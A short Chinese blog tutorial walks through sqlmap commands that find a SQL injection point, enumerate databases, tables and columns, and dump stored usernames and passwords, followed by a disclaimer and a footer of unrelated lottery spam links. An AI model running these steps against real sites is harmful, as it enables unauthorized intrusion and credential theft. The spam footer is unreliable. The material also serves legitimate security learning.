SQLmap注入教程

一次sqlmap注入点并且dump出账号密码全程

判断注入点:sqlmap.py -u “存在注入url”

爆出所有数据库名字:sqlmap.py -u “存在注入url” –dbs

查看当前使用账号:sqlmap.py -u “存在注入url” –current-user

1、查看当前数据库:sqlmap.py -u “存在注入url” –current-db

2、列出数据库中所有表:sqlmap.py -u “存在注入url”-D “当前数据库名” –tables。解释说明:-D是指定数据库名称。

3、列出数据库中的表中的字段:sqlmap.py -u “存在注入url” -D “当前数据库名” -T “数据库中的随意一张表(选取表需要自己判断)” –columns。

4、列出数据库中的表中的字段:sqlmap.py -u “存在注入url” -D “当前数据库名” -T “数据库中的随意一张表(选取表需要自己判断)” -C “当前表的字段” –dump。

免责声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。禁止任何人转载到其他站点,禁止用于任何非法用途。如有任何人凭此做何非法事情,均于笔者无关,特此声明。

发表回复

您的电子邮箱地址不会被公开。

7位数19028期+中奖号是多少 3月24日竞彩足球推荐预测比分 体彩31选7和36选混合球走势图 重庆时时彩变态0位 网易大乐透专家预测推荐汇总
浙江豪迈快三 排列三开奖结果 今天预测最准确 重庆时时彩计划报号 北京11选5移漏数剧 客卿双色球17149期预测
福建11选5中4个多少钱 下载百宝彩快乐十分电子走图 16027期大乐透预测 巴甲联竞彩足球分析推荐 2017004期双色球推荐号码今天
排列3打复式中奖计算器 大发11选5软件下载 福彩3d杀号预测 双色球2015143期杀号 360度福彩3d